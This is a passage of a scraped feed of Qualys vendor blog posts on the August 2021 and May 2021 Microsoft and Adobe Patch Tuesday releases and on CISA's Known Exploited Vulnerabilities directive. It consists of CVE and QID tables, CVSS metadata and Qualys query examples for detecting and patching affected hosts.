[_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), [_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-14T06:32:34", "description": "### Microsoft Patch Tuesday \u2013 May 2021\n\nMicrosoft patched 55 CVEs in their May 2021 Patch Tuesday release, of which 4 are rated as critical severity. Three 0-day vulnerability patches were included in the release. As of this publication date, none have been exploited.\n\nQualys released 12 QIDs on the same day, providing vulnerability detection and patch management coverage (where applicable) for all 55 CVEs and the related KBs.\n\n#### Critical Microsoft vulnerabilities patched: \n\n**CVE-2021-31181 **- SharePoint Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in SharePoint (CVE-2021-31181). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 8.8 by the vendor. \n\n**CVE-2021-31166 **- HTTP Protocol Stack Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in Windows. This vulnerability allows an unauthenticated attacker to remotely execute code as kernel. This is a wormable vulnerability where an attacker can simply send a malicious crafted packet to the target impacted web-server. CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 9.8 by the vendor.\n\n**CVE-2021-28476** - Hyper-V Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE in Windows Server that impacts Hyper-V. Though the exploitation of this vulnerability is less likely (according to Microsoft), this should be prioritized for patching since adversaries can abuse this vulnerability and cause Denial of Service (DoS) in the form of a bug check. This CVE is assigned a CVSSv3 base score of 9.9 by the vendor.\n\n#### Three 0-day vulnerabilities patched: \n\n * CVE-2021-31204 - .NET and Visual Studio Elevation of Privilege Vulnerability \n * CVE-2021-31207 - Microsoft Exchange Server Security Feature Bypass Vulnerability\n * CVE-2021-31200 - Common Utilities Remote Code Execution Vulnerability\n\n#### Qualys QIDs Providing Coverage\n\nQID| Title| Severity| CVE ID \n---|---|---|--- \n100415| Microsoft Internet Explorer Security Update for May 2021| Medium| CVE-2021-26419 \n91762| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities May 2021| High| CVE-2021-31181 \nCVE-2021-31173 \nCVE-2021-31172 \nCVE-2021-31171 \nCVE-2021-26418 \nCVE-2021-28478 \nCVE-2021-28474 \n110381| Microsoft Office and Microsoft Office Services and Web Apps Security Update May 2021| High| CVE-2021-31180 \nCVE-2021-31179 \nCVE-2021-31178 \nCVE-2021-31177 \nCVE-2021-31176 \nCVE-2021-31175 \nCVE-2021-31174 \nCVE-2021-28455 \n110382| Microsoft Skype for Business Server Security and Lync Server Update for May 2021| High| CVE-2021-26421 \nCVE-2021-26422 \n375556| Visual Studio Code Remote Code Execution Vulnerability| High| CVE-2021-31214 \nCVE-2021-31211 \n375557| Visual Studio Code Remote Development for Containers Extension Remote Code Execution Vulnerability| Medium| CVE-2021-31213 \n50111| Microsoft Exchange Server Multiple Vulnerabilities - May 2021| High| CVE-2021-31209 \nCVE-2021-31207 \nCVE-2021-31198 \nCVE-2021-31195 \n91762| Microsoft Windows Security Update for May 2021| Critical| CVE-2021-31192 \nCVE-2021-31188 \nCVE-2021-31170 \nCVE-2021-28476 \nCVE-2021-31184 \nCVE-2021-31190 \nCVE-2021-31167 \nCVE-2021-31168 \nCVE-2021-31208 \nCVE-2021-31169 \nCVE-2021-31165 \nCVE-2021-1720 \nCVE-2021-28479 \nCVE-2021-31185 \nCVE-2021-31194 \nCVE-2021-31191 \nCVE-2021-31186 \nCVE-2021-31205 \nCVE-2021-31193 \nCVE-2021-31187 \nCVE-2020-26144 \nCVE-2020-24587 \nCVE-2020-24588 \n91763| Microsoft Visual Studio Security Update for May 2021| High| CVE-2021-27068 \nCVE-2021-31204 \n91764| Microsoft Windows Web Media Extensions Remote Code Execution Vulnerability| High| CVE-2021-28465 \n91766| Microsoft .NET Core Security Update May 2021| Medium| CVE-2021-31204 \n91767| Microsoft Windows HTTP Protocol Stack Remote Code Execution Vulnerability - May 2021| Critical| CVE-2021-31166 \n \n### Adobe Patch Tuesday \u2013 May 2021\n\nAdobe addressed 46 CVEs this Patch Tuesday, of which 26 are rated as critical severity, including one critical 0-day (CVE-2021-28550) impacting Adobe Acrobat and Reader product.\n\nAdobe products patches include the following: Experience Manager, InDesign, Illustrator, InCopy, Genuine Service, Acrobat and Reader, Magento, Creative Cloud Desktop Application, Media Encoder, After Effects, Medium, and Animate products.\n\nQualys released 5 QIDs on the same day, providing vulnerability detection for 30 of the 46 CVEs, including 8 rated as critical.\n\n#### One 0-day vulnerability patched:\n\n**CVE-2021-28550**\n\nThis is a Remote Code Execution vulnerability impacting Adobe Acrobat and Reader and is being actively exploited in the wild on Windows devices. Adversaries are able to execute arbitrary code in windows, including installing malicious applications and gaining complete access to target machines.\n\nAdobe Security Bulletin| QID| Severity| CVE ID \n---|---|---|--- \n[APSB21-22 Security updates available for Adobe InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>)| 375549| 